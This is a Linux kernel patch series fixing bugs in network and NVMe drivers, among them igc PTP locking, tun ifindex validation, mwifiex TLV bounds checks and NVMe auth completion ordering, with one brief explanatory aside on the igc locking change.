+@@ -712,24 +708,33 @@ static void igc_ptp_tx_hwtstamp(struct igc_adapter *adapter)
+  * igc_ptp_tx_work
+  * @work: pointer to work struct
+  *
+- * This work function polls the TSYNCTXCTL valid bit to determine when a
+- * timestamp has been taken for the current stored skb.
++ * This work function checks the TSYNCTXCTL valid bit to determine when
++ * a timestamp has been taken for the current stored skb.
+  */
+ static void igc_ptp_tx_work(struct work_struct *work)
+ {
+ 	struct igc_adapter *adapter = container_of(work, struct igc_adapter,
+ 						   ptp_tx_work);
+ 	struct igc_hw *hw = &adapter->hw;
++	unsigned long flags;
+ 	u32 tsynctxctl;
+ 
+-	if (!test_bit(__IGC_PTP_TX_IN_PROGRESS, &adapter->state))
+-		return;
++	spin_lock_irqsave(&adapter->ptp_tx_lock, flags);
++
++	if (!adapter->ptp_tx_skb)
++		goto unlock;
+ 
+ 	tsynctxctl = rd32(IGC_TSYNCTXCTL);
+-	if (WARN_ON_ONCE(!(tsynctxctl & IGC_TSYNCTXCTL_TXTT_0)))
+-		return;
++	tsynctxctl &= IGC_TSYNCTXCTL_TXTT_0;
++	if (!tsynctxctl) {
++		WARN_ONCE(1, "Received a TSTAMP interrupt but no TSTAMP is ready.\n");
++		goto unlock;
++	}
+ 
+ 	igc_ptp_tx_hwtstamp(adapter);
++
++unlock:
++	spin_unlock_irqrestore(&adapter->ptp_tx_lock, flags);
+ }
+ 
+ /**
+@@ -978,6 +983,7 @@ void igc_ptp_init(struct igc_adapter *adapter)
+ 		return;
+ 	}
+ 
++	spin_lock_init(&adapter->ptp_tx_lock);
+ 	spin_lock_init(&adapter->tmreg_lock);
+ 	INIT_WORK(&adapter->ptp_tx_work, igc_ptp_tx_work);
+ 
+@@ -1042,7 +1048,6 @@ void igc_ptp_suspend(struct igc_adapter *adapter)
+ 	cancel_work_sync(&adapter->ptp_tx_work);
+ 	dev_kfree_skb_any(adapter->ptp_tx_skb);
+ 	adapter->ptp_tx_skb = NULL;
+-	clear_bit_unlock(__IGC_PTP_TX_IN_PROGRESS, &adapter->state);
+ 
+ 	if (pci_device_is_present(adapter->pdev)) {
+ 		igc_ptp_time_save(adapter);
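
With __IGC_PTP_TX_IN_PROGRESS gone, ptp_tx_skb itself is the in-flight flag and ptp_tx_lock serializes everyone who touches it. The ownership rule the hunks above implement, sketched (the claiming side is paraphrased, not quoted verbatim from the driver):

    /* Sketch: at most one outstanding Tx timestamp request */
    spin_lock_irqsave(&adapter->ptp_tx_lock, flags);
    if (!adapter->ptp_tx_skb) {
            adapter->ptp_tx_skb = skb_get(skb);     /* claim the single slot */
            adapter->ptp_tx_start = jiffies;
    } else {
            adapter->tx_hwtstamp_skipped++;         /* slot busy: skip request */
    }
    spin_unlock_irqrestore(&adapter->ptp_tx_lock, flags);
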
+diff --git a/drivers/net/ethernet/intel/igc/igc_tsn.c b/drivers/net/ethernet/intel/igc/igc_tsn.c
+index 356c7455c5cee..725db36e399d2 100644
+--- a/drivers/net/ethernet/intel/igc/igc_tsn.c
++++ b/drivers/net/ethernet/intel/igc/igc_tsn.c
+@@ -2,6 +2,7 @@
+ /* Copyright (c)  2019 Intel Corporation */
+ 
+ #include "igc.h"
++#include "igc_hw.h"
+ #include "igc_tsn.h"
+ 
+ static bool is_any_launchtime(struct igc_adapter *adapter)
+@@ -62,7 +63,8 @@ static int igc_tsn_disable_offload(struct igc_adapter *adapter)
+ 
+ 	tqavctrl = rd32(IGC_TQAVCTRL);
+ 	tqavctrl &= ~(IGC_TQAVCTRL_TRANSMIT_MODE_TSN |
+-		      IGC_TQAVCTRL_ENHANCED_QAV);
++		      IGC_TQAVCTRL_ENHANCED_QAV | IGC_TQAVCTRL_FUTSCDDIS);
++
+ 	wr32(IGC_TQAVCTRL, tqavctrl);
+ 
+ 	for (i = 0; i < adapter->num_tx_queues; i++) {
+@@ -82,25 +84,16 @@ static int igc_tsn_disable_offload(struct igc_adapter *adapter)
+ static int igc_tsn_enable_offload(struct igc_adapter *adapter)
+ {
+ 	struct igc_hw *hw = &adapter->hw;
++	bool tsn_mode_reconfig = false;
+ 	u32 tqavctrl, baset_l, baset_h;
+ 	u32 sec, nsec, cycle;
+ 	ktime_t base_time, systim;
+ 	int i;
+ 
+-	cycle = adapter->cycle_time;
+-	base_time = adapter->base_time;
+-
+ 	wr32(IGC_TSAUXC, 0);
+ 	wr32(IGC_DTXMXPKTSZ, IGC_DTXMXPKTSZ_TSN);
+ 	wr32(IGC_TXPBS, IGC_TXPBSIZE_TSN);
+ 
+-	tqavctrl = rd32(IGC_TQAVCTRL);
+-	tqavctrl |= IGC_TQAVCTRL_TRANSMIT_MODE_TSN | IGC_TQAVCTRL_ENHANCED_QAV;
+-	wr32(IGC_TQAVCTRL, tqavctrl);
+-
+-	wr32(IGC_QBVCYCLET_S, cycle);
+-	wr32(IGC_QBVCYCLET, cycle);
+-
+ 	for (i = 0; i < adapter->num_tx_queues; i++) {
+ 		struct igc_ring *ring = adapter->tx_ring[i];
+ 		u32 txqctl = 0;
+@@ -203,21 +196,58 @@ skip_cbs:
+ 		wr32(IGC_TXQCTL(i), txqctl);
+ 	}
+ 
++	tqavctrl = rd32(IGC_TQAVCTRL) & ~IGC_TQAVCTRL_FUTSCDDIS;
++
++	if (tqavctrl & IGC_TQAVCTRL_TRANSMIT_MODE_TSN)
++		tsn_mode_reconfig = true;
++
++	tqavctrl |= IGC_TQAVCTRL_TRANSMIT_MODE_TSN | IGC_TQAVCTRL_ENHANCED_QAV;
++
++	cycle = adapter->cycle_time;
++	base_time = adapter->base_time;
++
+ 	nsec = rd32(IGC_SYSTIML);
+ 	sec = rd32(IGC_SYSTIMH);
+ 
+ 	systim = ktime_set(sec, nsec);
+-
+ 	if (ktime_compare(systim, base_time) > 0) {
+-		s64 n;
++		s64 n = div64_s64(ktime_sub_ns(systim, base_time), cycle);
+ 
+-		n = div64_s64(ktime_sub_ns(systim, base_time), cycle);
+ 		base_time = ktime_add_ns(base_time, (n + 1) * cycle);
++
++		/* Increase the counter if scheduling into the past while
++		 * the Gate Control List (GCL) is running.
++		 */
++		if ((rd32(IGC_BASET_H) || rd32(IGC_BASET_L)) &&
++		    (adapter->tc_setup_type == TC_SETUP_QDISC_TAPRIO) &&
++		    tsn_mode_reconfig)
++			adapter->qbv_config_change_errors++;
++	} else {
++		/* According to datasheet section 7.5.2.9.3.3, the FutScdDis bit
++		 * has to be configured before the cycle time and base time.
++		 * Tx won't hang if a GCL is already running,
++		 * so in this case we don't need to set FutScdDis.
++		 */
++		if (igc_is_device_id_i226(hw) &&
++		    !(rd32(IGC_BASET_H) || rd32(IGC_BASET_L)))
++			tqavctrl |= IGC_TQAVCTRL_FUTSCDDIS;
+ 	}
+ 
+-	baset_h = div_s64_rem(base_time, NSEC_PER_SEC, &baset_l);
++	wr32(IGC_TQAVCTRL, tqavctrl);
+ 
++	wr32(IGC_QBVCYCLET_S, cycle);
++	wr32(IGC_QBVCYCLET, cycle);
++
++	baset_h = div_s64_rem(base_time, NSEC_PER_SEC, &baset_l);
+ 	wr32(IGC_BASET_H, baset_h);
++
++	/* In i226, future base time is only supported when the FutScdDis bit
++	 * is enabled and only active for re-configuration.
++	 * In this case, initialize the base time with zero to create a
++	 * "re-configuration" scenario, then set the desired base time.
++	 */
++	if (tqavctrl & IGC_TQAVCTRL_FUTSCDDIS)
++		wr32(IGC_BASET_L, 0);
+ 	wr32(IGC_BASET_L, baset_l);
+ 
+ 	return 0;
+@@ -244,17 +274,14 @@ int igc_tsn_reset(struct igc_adapter *adapter)
+ 
+ int igc_tsn_offload_apply(struct igc_adapter *adapter)
+ {
+-	int err;
++	struct igc_hw *hw = &adapter->hw;
+ 
+-	if (netif_running(adapter->netdev)) {
++	if (netif_running(adapter->netdev) && igc_is_device_id_i225(hw)) {
+ 		schedule_work(&adapter->reset_task);
+ 		return 0;
+ 	}
+ 
+-	err = igc_tsn_enable_offload(adapter);
+-	if (err < 0)
+-		return err;
++	igc_tsn_reset(adapter);
+ 
+-	adapter->flags = igc_tsn_new_flags(adapter);
+ 	return 0;
+ }
+diff --git a/drivers/net/ethernet/marvell/octeon_ep/octep_main.c b/drivers/net/ethernet/marvell/octeon_ep/octep_main.c
+index 61354f7985035..e171097c13654 100644
+--- a/drivers/net/ethernet/marvell/octeon_ep/octep_main.c
++++ b/drivers/net/ethernet/marvell/octeon_ep/octep_main.c
+@@ -707,20 +707,19 @@ static netdev_tx_t octep_start_xmit(struct sk_buff *skb,
+ 		hw_desc->dptr = tx_buffer->sglist_dma;
+ 	}
+ 
+-	/* Flush the hw descriptor before writing to doorbell */
+-	wmb();
+-
+-	/* Ring Doorbell to notify the NIC there is a new packet */
+-	writel(1, iq->doorbell_reg);
++	netdev_tx_sent_queue(iq->netdev_q, skb->len);
++	skb_tx_timestamp(skb);
+ 	atomic_inc(&iq->instr_pending);
+ 	wi++;
+ 	if (wi == iq->max_count)
+ 		wi = 0;
+ 	iq->host_write_index = wi;
++	/* Flush the hw descriptor before writing to doorbell */
++	wmb();
+ 
+-	netdev_tx_sent_queue(iq->netdev_q, skb->len);
++	/* Ring Doorbell to notify the NIC there is a new packet */
++	writel(1, iq->doorbell_reg);
+ 	iq->stats.instr_posted++;
+-	skb_tx_timestamp(skb);
+ 	return NETDEV_TX_OK;
+ 
+ dma_map_sg_err:
+diff --git a/drivers/net/ethernet/marvell/sky2.h b/drivers/net/ethernet/marvell/sky2.h
+index ddec1627f1a7b..8d0bacf4e49cc 100644
+--- a/drivers/net/ethernet/marvell/sky2.h
++++ b/drivers/net/ethernet/marvell/sky2.h
+@@ -2195,7 +2195,7 @@ struct rx_ring_info {
+ 	struct sk_buff	*skb;
+ 	dma_addr_t	data_addr;
+ 	DEFINE_DMA_UNMAP_LEN(data_size);
+-	dma_addr_t	frag_addr[ETH_JUMBO_MTU >> PAGE_SHIFT];
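++	/* "?: 1" keeps the array non-empty when PAGE_SIZE >= ETH_JUMBO_MTU (e.g. 64K pages) */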
++	dma_addr_t	frag_addr[ETH_JUMBO_MTU >> PAGE_SHIFT ?: 1];
+ };
+ 
+ enum flow_control {
+diff --git a/drivers/net/ethernet/mellanox/mlx5/core/diag/fw_tracer.c b/drivers/net/ethernet/mellanox/mlx5/core/diag/fw_tracer.c
+index c4e40834e3ff9..374c0011a127b 100644
+--- a/drivers/net/ethernet/mellanox/mlx5/core/diag/fw_tracer.c
++++ b/drivers/net/ethernet/mellanox/mlx5/core/diag/fw_tracer.c
+@@ -821,7 +821,7 @@ static void mlx5_fw_tracer_ownership_change(struct work_struct *work)
+ 
+ 	mlx5_core_dbg(tracer->dev, "FWTracer: ownership changed, current=(%d)\n", tracer->owner);
+ 	if (tracer->owner) {
+-		tracer->owner = false;
++		mlx5_fw_tracer_ownership_acquire(tracer);
+ 		return;
+ 	}
+ 
+diff --git a/drivers/net/ethernet/mellanox/mlx5/core/en/tc_tun_encap.c b/drivers/net/ethernet/mellanox/mlx5/core/en/tc_tun_encap.c
+index cd15d36b1507e..907ad6ffe7275 100644
+--- a/drivers/net/ethernet/mellanox/mlx5/core/en/tc_tun_encap.c
++++ b/drivers/net/ethernet/mellanox/mlx5/core/en/tc_tun_encap.c
+@@ -23,7 +23,8 @@ static int mlx5e_set_int_port_tunnel(struct mlx5e_priv *priv,
+ 
+ 	route_dev = dev_get_by_index(dev_net(e->out_dev), e->route_dev_ifindex);
+ 
+-	if (!route_dev || !netif_is_ovs_master(route_dev))
++	if (!route_dev || !netif_is_ovs_master(route_dev) ||
++	    attr->parse_attr->filter_dev == e->out_dev)
+ 		goto out;
+ 
+ 	err = mlx5e_set_fwd_to_int_port_actions(priv, attr, e->route_dev_ifindex,
+diff --git a/drivers/net/ethernet/mellanox/mlx5/core/eswitch.c b/drivers/net/ethernet/mellanox/mlx5/core/eswitch.c
+index 4b9d567c8f473..48939c72b5925 100644
+--- a/drivers/net/ethernet/mellanox/mlx5/core/eswitch.c
++++ b/drivers/net/ethernet/mellanox/mlx5/core/eswitch.c
+@@ -969,11 +969,8 @@ const u32 *mlx5_esw_query_functions(struct mlx5_core_dev *dev)
+ 	return ERR_PTR(err);
+ }
+ 
+-static void mlx5_eswitch_event_handlers_register(struct mlx5_eswitch *esw)
++static void mlx5_eswitch_event_handler_register(struct mlx5_eswitch *esw)
+ {
+-	MLX5_NB_INIT(&esw->nb, eswitch_vport_event, NIC_VPORT_CHANGE);
+-	mlx5_eq_notifier_register(esw->dev, &esw->nb);
+-
+ 	if (esw->mode == MLX5_ESWITCH_OFFLOADS && mlx5_eswitch_is_funcs_handler(esw->dev)) {
+ 		MLX5_NB_INIT(&esw->esw_funcs.nb, mlx5_esw_funcs_changed_handler,
+ 			     ESW_FUNCTIONS_CHANGED);
+@@ -981,13 +978,11 @@ static void mlx5_eswitch_event_handlers_register(struct mlx5_eswitch *esw)
+ 	}
+ }
+ 
+-static void mlx5_eswitch_event_handlers_unregister(struct mlx5_eswitch *esw)
++static void mlx5_eswitch_event_handler_unregister(struct mlx5_eswitch *esw)
+ {
+ 	if (esw->mode == MLX5_ESWITCH_OFFLOADS && mlx5_eswitch_is_funcs_handler(esw->dev))
+ 		mlx5_eq_notifier_unregister(esw->dev, &esw->esw_funcs.nb);
+ 
+-	mlx5_eq_notifier_unregister(esw->dev, &esw->nb);
+-
+ 	flush_workqueue(esw->work_queue);
+ }
+ 
+@@ -1273,6 +1268,9 @@ int mlx5_eswitch_enable_locked(struct mlx5_eswitch *esw, int num_vfs)
+ 
+ 	mlx5_eswitch_update_num_of_vfs(esw, num_vfs);
+ 
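++	/* Register the vport-change notifier before the mode-specific enable arms vport events, so none are missed */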
++	MLX5_NB_INIT(&esw->nb, eswitch_vport_event, NIC_VPORT_CHANGE);
++	mlx5_eq_notifier_register(esw->dev, &esw->nb);
++
+ 	if (esw->mode == MLX5_ESWITCH_LEGACY) {
+ 		err = esw_legacy_enable(esw);
+ 	} else {
+@@ -1285,7 +1283,7 @@ int mlx5_eswitch_enable_locked(struct mlx5_eswitch *esw, int num_vfs)
+ 
+ 	esw->fdb_table.flags |= MLX5_ESW_FDB_CREATED;
+ 
+-	mlx5_eswitch_event_handlers_register(esw);
++	mlx5_eswitch_event_handler_register(esw);
+ 
+ 	esw_info(esw->dev, "Enable: mode(%s), nvfs(%d), active vports(%d)\n",
+ 		 esw->mode == MLX5_ESWITCH_LEGACY ? "LEGACY" : "OFFLOADS",
+@@ -1394,7 +1392,8 @@ void mlx5_eswitch_disable_locked(struct mlx5_eswitch *esw)
+ 	 */
+ 	mlx5_esw_mode_change_notify(esw, MLX5_ESWITCH_LEGACY);
+ 
+-	mlx5_eswitch_event_handlers_unregister(esw);
++	mlx5_eq_notifier_unregister(esw->dev, &esw->nb);
++	mlx5_eswitch_event_handler_unregister(esw);
+ 
+ 	esw_info(esw->dev, "Disable: mode(%s), nvfs(%d), active vports(%d)\n",
+ 		 esw->mode == MLX5_ESWITCH_LEGACY ? "LEGACY" : "OFFLOADS",
+diff --git a/drivers/net/ethernet/qlogic/qed/qed_ll2.c b/drivers/net/ethernet/qlogic/qed/qed_ll2.c
+index ed274f033626d..810df65cdf085 100644
+--- a/drivers/net/ethernet/qlogic/qed/qed_ll2.c
++++ b/drivers/net/ethernet/qlogic/qed/qed_ll2.c
+@@ -113,7 +113,10 @@ static void qed_ll2b_complete_tx_packet(void *cxt,
+ static int qed_ll2_alloc_buffer(struct qed_dev *cdev,
+ 				u8 **data, dma_addr_t *phys_addr)
+ {
+-	*data = kmalloc(cdev->ll2->rx_size, GFP_ATOMIC);
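++	/* build_skb() needs NET_SKB_PAD headroom plus room for skb_shared_info */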
++	size_t size = cdev->ll2->rx_size + NET_SKB_PAD +
++		      SKB_DATA_ALIGN(sizeof(struct skb_shared_info));
++
++	*data = kmalloc(size, GFP_ATOMIC);
+ 	if (!(*data)) {
+ 		DP_INFO(cdev, "Failed to allocate LL2 buffer data\n");
+ 		return -ENOMEM;
+@@ -2590,7 +2593,7 @@ static int qed_ll2_start(struct qed_dev *cdev, struct qed_ll2_params *params)
+ 	INIT_LIST_HEAD(&cdev->ll2->list);
+ 	spin_lock_init(&cdev->ll2->lock);
+ 
+-	cdev->ll2->rx_size = NET_SKB_PAD + ETH_HLEN +
++	cdev->ll2->rx_size = PRM_DMA_PAD_BYTES_NUM + ETH_HLEN +
+ 			     L1_CACHE_BYTES + params->mtu;
+ 
+ 	/* Allocate memory for LL2.
+diff --git a/drivers/net/phy/bcm7xxx.c b/drivers/net/phy/bcm7xxx.c
+index 6cebf3aaa621f..dc5b27cb48fb0 100644
+--- a/drivers/net/phy/bcm7xxx.c
++++ b/drivers/net/phy/bcm7xxx.c
+@@ -907,6 +907,9 @@ static void bcm7xxx_28nm_remove(struct phy_device *phydev)
+ 	.name		= _name,					\
+ 	/* PHY_BASIC_FEATURES */					\
+ 	.flags		= PHY_IS_INTERNAL,				\
++	.get_sset_count	= bcm_phy_get_sset_count,			\
++	.get_strings	= bcm_phy_get_strings,				\
++	.get_stats	= bcm7xxx_28nm_get_phy_stats,			\
+ 	.probe		= bcm7xxx_28nm_probe,				\
+ 	.remove		= bcm7xxx_28nm_remove,				\
+ 	.config_init	= bcm7xxx_16nm_ephy_config_init,		\
+diff --git a/drivers/net/tun.c b/drivers/net/tun.c
+index 7544df1ff50ec..d373953ddc300 100644
+--- a/drivers/net/tun.c
++++ b/drivers/net/tun.c
+@@ -3056,10 +3056,11 @@ static long __tun_chr_ioctl(struct file *file, unsigned int cmd,
+ 	struct net *net = sock_net(&tfile->sk);
+ 	struct tun_struct *tun;
+ 	void __user* argp = (void __user*)arg;
+-	unsigned int ifindex, carrier;
++	unsigned int carrier;
+ 	struct ifreq ifr;
+ 	kuid_t owner;
+ 	kgid_t group;
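++	/* signed, so TUNSETIFINDEX can reject negative values from userspace */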
++	int ifindex;
+ 	int sndbuf;
+ 	int vnet_hdr_sz;
+ 	int le;
+@@ -3115,7 +3116,9 @@ static long __tun_chr_ioctl(struct file *file, unsigned int cmd,
+ 		ret = -EFAULT;
+ 		if (copy_from_user(&ifindex, argp, sizeof(ifindex)))
+ 			goto unlock;
+-
++		ret = -EINVAL;
++		if (ifindex < 0)
++			goto unlock;
+ 		ret = 0;
+ 		tfile->ifindex = ifindex;
+ 		goto unlock;
+diff --git a/drivers/net/usb/smsc95xx.c b/drivers/net/usb/smsc95xx.c
+index 563ecd27b93ea..17da42fe605c3 100644
+--- a/drivers/net/usb/smsc95xx.c
++++ b/drivers/net/usb/smsc95xx.c
+@@ -897,7 +897,7 @@ static int smsc95xx_reset(struct usbnet *dev)
+ 
+ 	if (timeout >= 100) {
+ 		netdev_warn(dev->net, "timeout waiting for completion of Lite Reset\n");
+-		return ret;
++		return -ETIMEDOUT;
+ 	}
+ 
+ 	ret = smsc95xx_set_mac_address(dev);
+diff --git a/drivers/net/wireless/intel/iwlwifi/mvm/tx.c b/drivers/net/wireless/intel/iwlwifi/mvm/tx.c
+index 542cfcad6e0e6..2d01f6226b7c6 100644
+--- a/drivers/net/wireless/intel/iwlwifi/mvm/tx.c
++++ b/drivers/net/wireless/intel/iwlwifi/mvm/tx.c
+@@ -1585,6 +1585,7 @@ static void iwl_mvm_rx_tx_cmd_single(struct iwl_mvm *mvm,
+ 		iwl_trans_free_tx_cmd(mvm->trans, info->driver_data[1]);
+ 
+ 		memset(&info->status, 0, sizeof(info->status));
++		info->flags &= ~(IEEE80211_TX_STAT_ACK | IEEE80211_TX_STAT_TX_FILTERED);
+ 
+ 		/* inform mac80211 about what happened with the frame */
+ 		switch (status & TX_STATUS_MSK) {
+@@ -1936,6 +1937,8 @@ static void iwl_mvm_tx_reclaim(struct iwl_mvm *mvm, int sta_id, int tid,
+ 		 */
+ 		if (!is_flush)
+ 			info->flags |= IEEE80211_TX_STAT_ACK;
++		else
++			info->flags &= ~IEEE80211_TX_STAT_ACK;
+ 	}
+ 
+ 	/*
+diff --git a/drivers/net/wireless/marvell/mwifiex/11n_rxreorder.c b/drivers/net/wireless/marvell/mwifiex/11n_rxreorder.c
+index 7351acac6932d..54ab8b54369ba 100644
+--- a/drivers/net/wireless/marvell/mwifiex/11n_rxreorder.c
++++ b/drivers/net/wireless/marvell/mwifiex/11n_rxreorder.c
+@@ -921,6 +921,14 @@ void mwifiex_11n_rxba_sync_event(struct mwifiex_private *priv,
+ 	while (tlv_buf_left >= sizeof(*tlv_rxba)) {
+ 		tlv_type = le16_to_cpu(tlv_rxba->header.type);
+ 		tlv_len  = le16_to_cpu(tlv_rxba->header.len);
++		if (size_add(sizeof(tlv_rxba->header), tlv_len) > tlv_buf_left) {
++			mwifiex_dbg(priv->adapter, WARN,
++				    "TLV size (%zu) overflows event_buf buf_left=%d\n",
++				    size_add(sizeof(tlv_rxba->header), tlv_len),
++				    tlv_buf_left);
++			return;
++		}
++
+ 		if (tlv_type != TLV_TYPE_RXBA_SYNC) {
+ 			mwifiex_dbg(priv->adapter, ERROR,
+ 				    "Wrong TLV id=0x%x\n", tlv_type);
+@@ -929,6 +937,14 @@ void mwifiex_11n_rxba_sync_event(struct mwifiex_private *priv,
+ 
+ 		tlv_seq_num = le16_to_cpu(tlv_rxba->seq_num);
+ 		tlv_bitmap_len = le16_to_cpu(tlv_rxba->bitmap_len);
++		if (size_add(sizeof(*tlv_rxba), tlv_bitmap_len) > tlv_buf_left) {
++			mwifiex_dbg(priv->adapter, WARN,
++				    "TLV size (%zu) overflows event_buf buf_left=%d\n",
++				    size_add(sizeof(*tlv_rxba), tlv_bitmap_len),
++				    tlv_buf_left);
++			return;
++		}
++
+ 		mwifiex_dbg(priv->adapter, INFO,
+ 			    "%pM tid=%d seq_num=%d bitmap_len=%d\n",
+ 			    tlv_rxba->mac, tlv_rxba->tid, tlv_seq_num,
+diff --git a/drivers/nvme/host/ioctl.c b/drivers/nvme/host/ioctl.c
+index 8224675f8de25..b33004a4bcb5a 100644
+--- a/drivers/nvme/host/ioctl.c
++++ b/drivers/nvme/host/ioctl.c
+@@ -32,9 +32,13 @@ static void *nvme_add_user_metadata(struct request *req, void __user *ubuf,
+ 	if (!buf)
+ 		goto out;
+ 
+-	ret = -EFAULT;
+-	if ((req_op(req) == REQ_OP_DRV_OUT) && copy_from_user(buf, ubuf, len))
+-		goto out_free_meta;
++	if (req_op(req) == REQ_OP_DRV_OUT) {
++		ret = -EFAULT;
++		if (copy_from_user(buf, ubuf, len))
++			goto out_free_meta;
++	} else {
++		memset(buf, 0, len);
++	}
+ 
+ 	bip = bio_integrity_alloc(bio, GFP_KERNEL, 1);
+ 	if (IS_ERR(bip)) {
+diff --git a/drivers/nvme/host/pci.c b/drivers/nvme/host/pci.c
+index 64990a2cfd0a7..886c3fc9578e4 100644
+--- a/drivers/nvme/host/pci.c
++++ b/drivers/nvme/host/pci.c
+@@ -3439,7 +3439,8 @@ static const struct pci_device_id nvme_id_table[] = {
+ 	{ PCI_VDEVICE(INTEL, 0x0a54),	/* Intel P4500/P4600 */
+ 		.driver_data = NVME_QUIRK_STRIPE_SIZE |
+ 				NVME_QUIRK_DEALLOCATE_ZEROES |
+-				NVME_QUIRK_IGNORE_DEV_SUBNQN, },
++				NVME_QUIRK_IGNORE_DEV_SUBNQN |
++				NVME_QUIRK_BOGUS_NID, },
+ 	{ PCI_VDEVICE(INTEL, 0x0a55),	/* Dell Express Flash P4600 */
+ 		.driver_data = NVME_QUIRK_STRIPE_SIZE |
+ 				NVME_QUIRK_DEALLOCATE_ZEROES, },
+diff --git a/drivers/nvme/host/rdma.c b/drivers/nvme/host/rdma.c
+index c478480f54aa2..aa1734e2fd44e 100644
+--- a/drivers/nvme/host/rdma.c
++++ b/drivers/nvme/host/rdma.c
+@@ -643,6 +643,9 @@ static void __nvme_rdma_stop_queue(struct nvme_rdma_queue *queue)
+ 
+ static void nvme_rdma_stop_queue(struct nvme_rdma_queue *queue)
+ {
++	if (!test_bit(NVME_RDMA_Q_ALLOCATED, &queue->flags))
++		return;
++
+ 	mutex_lock(&queue->queue_lock);
+ 	if (test_and_clear_bit(NVME_RDMA_Q_LIVE, &queue->flags))
+ 		__nvme_rdma_stop_queue(queue);
+diff --git a/drivers/nvme/target/fabrics-cmd-auth.c b/drivers/nvme/target/fabrics-cmd-auth.c
+index 7970a7640e585..fbae76cdc2546 100644
+--- a/drivers/nvme/target/fabrics-cmd-auth.c
++++ b/drivers/nvme/target/fabrics-cmd-auth.c
+@@ -337,19 +337,21 @@ done:
+ 			 __func__, ctrl->cntlid, req->sq->qid,
+ 			 status, req->error_loc);
+ 	req->cqe->result.u64 = 0;
+-	nvmet_req_complete(req, status);
+ 	if (req->sq->dhchap_step != NVME_AUTH_DHCHAP_MESSAGE_SUCCESS2 &&
+ 	    req->sq->dhchap_step != NVME_AUTH_DHCHAP_MESSAGE_FAILURE2) {
+ 		unsigned long auth_expire_secs = ctrl->kato ? ctrl->kato : 120;
+ 
+ 		mod_delayed_work(system_wq, &req->sq->auth_expired_work,
+ 				 auth_expire_secs * HZ);
+-		return;
++		goto complete;
+ 	}
+ 	/* Final states, clear up variables */
+ 	nvmet_auth_sq_free(req->sq);
+ 	if (req->sq->dhchap_step == NVME_AUTH_DHCHAP_MESSAGE_FAILURE2)
+ 		nvmet_ctrl_fatal_error(ctrl);
++
++complete:
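++	/* Complete the request only after the sq auth state is torn down */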
++	nvmet_req_complete(req, status);
+ }
+ 
+ static int nvmet_auth_challenge(struct nvmet_req *req, void *d, int al)
+@@ -527,11 +529,12 @@ void nvmet_execute_auth_receive(struct nvmet_req *req)
+ 	kfree(d);
+ done:
+ 	req->cqe->result.u64 = 0;
+-	nvmet_req_complete(req, status);
++
+ 	if (req->sq->dhchap_step == NVME_AUTH_DHCHAP_MESSAGE_SUCCESS2)
+ 		nvmet_auth_sq_free(req->sq);
+ 	else if (req->sq->dhchap_step == NVME_AUTH_DHCHAP_MESSAGE_FAILURE1) {
+ 		nvmet_auth_sq_free(req->sq);
+ 		nvmet_ctrl_fatal_error(ctrl);
+ 	}
++	nvmet_req_complete(req, status);
+ }
+diff --git a/drivers/nvme/target/tcp.c b/drivers/nvme/target/tcp.c
+index 5e29da94f72d6..355d80323b836 100644
+--- a/drivers/nvme/target/tcp.c
++++ b/drivers/nvme/target/tcp.c
+@@ -345,6 +345,7 @@ static void nvmet_tcp_fatal_error(struct nvmet_tcp_queue *queue)
+ 
+ static void nvmet_tcp_socket_error(struct nvmet_tcp_queue *queue, int status)
+ {
++	queue->rcv_state = NVMET_TCP_RECV_ERR;
+ 	if (status == -EPIPE || status == -ECONNRESET)
+ 		kernel_sock_shutdown(queue->sock, SHUT_RDWR);
+ 	else
+@@ -871,15 +872,11 @@ static int nvmet_tcp_handle_icreq(struct nvmet_tcp_queue *queue)
+ 	iov.iov_len = sizeof(*icresp);
+ 	ret = kernel_sendmsg(queue->sock, &msg, &iov, 1, iov.iov_len);
+ 	if (ret < 0)
+-		goto free_crypto;
++		return ret; /* queue removal will clean up */
+ 
+ 	queue->state = NVMET_TCP_Q_LIVE;
+ 	nvmet_prepare_receive_pdu(queue);
+ 	return 0;
+-free_crypto:
+-	if (queue->hdr_digest || queue->data_digest)
+-		nvmet_tcp_free_crypto(queue);
+-	return ret;
+ }
+ 
+ static void nvmet_tcp_handle_req_failure(struct nvmet_tcp_queue *queue,
+diff --git a/drivers/phy/motorola/phy-mapphone-mdm6600.c b/drivers/phy/motorola/phy-mapphone-mdm6600.c
+index 3cd4d51c247c3..67802f9e40ba0 100644
+--- a/drivers/phy/motorola/phy-mapphone-mdm6600.c
++++ b/drivers/phy/motorola/phy-mapphone-mdm6600.c
+@@ -122,16 +122,10 @@ static int phy_mdm6600_power_on(struct phy *x)
+ {
+ 	struct phy_mdm6600 *ddata = phy_get_drvdata(x);
+ 	struct gpio_desc *enable_gpio = ddata->ctrl_gpios[PHY_MDM6600_ENABLE];
+-	int error;
+ 
+ 	if (!ddata->enabled)
+ 		return -ENODEV;
+ 
+-	error = pinctrl_pm_select_default_state(ddata->dev);
+-	if (error)
+-		dev_warn(ddata->dev, "%s: error with default_state: %i\n",
+-			 __func__, error);
+-
+ 	gpiod_set_value_cansleep(enable_gpio, 1);
+ 
+ 	/* Allow aggressive PM for USB, it's only needed for n_gsm port */
+@@ -160,11 +154,6 @@ static int phy_mdm6600_power_off(struct phy *x)
+ 
+ 	gpiod_set_value_cansleep(enable_gpio, 0);
+ 
+-	error = pinctrl_pm_select_sleep_state(ddata->dev);
+-	if (error)
+-		dev_warn(ddata->dev, "%s: error with sleep_state: %i\n",
+-			 __func__, error);
+-
+ 	return 0;
+ }
+ 
+@@ -456,6 +445,7 @@ static void phy_mdm6600_device_power_off(struct phy_mdm6600 *ddata)
+ {
+ 	struct gpio_desc *reset_gpio =
+ 		ddata->ctrl_gpios[PHY_MDM6600_RESET];
++	int error;
+ 
+ 	ddata->enabled = false;
+ 	phy_mdm6600_cmd(ddata, PHY_MDM6600_CMD_BP_SHUTDOWN_REQ);
+@@ -471,6 +461,17 @@ static void phy_mdm6600_device_power_off(struct phy_mdm6600 *ddata)
+ 	} else {
+ 		dev_err(ddata->dev, "Timed out powering down\n");
+ 	}
++
++	/*
++	 * Keep reset gpio high with padconf internal pull-up resistor to
++	 * prevent modem from waking up during deeper SoC idle states. The
++	 * gpio bank lines can have glitches if not in the always-on wkup
++	 * domain.
++	 */
++	error = pinctrl_pm_select_sleep_state(ddata->dev);
++	if (error)
++		dev_warn(ddata->dev, "%s: error with sleep_state: %i\n",
++			 __func__, error);
+ }
+ 
+ static void phy_mdm6600_deferred_power_on(struct work_struct *work)
+@@ -571,12 +572,6 @@ static int phy_mdm6600_probe(struct platform_device *pdev)
+ 	ddata->dev = &pdev->dev;
+ 	platform_set_drvdata(pdev, ddata);
+ 
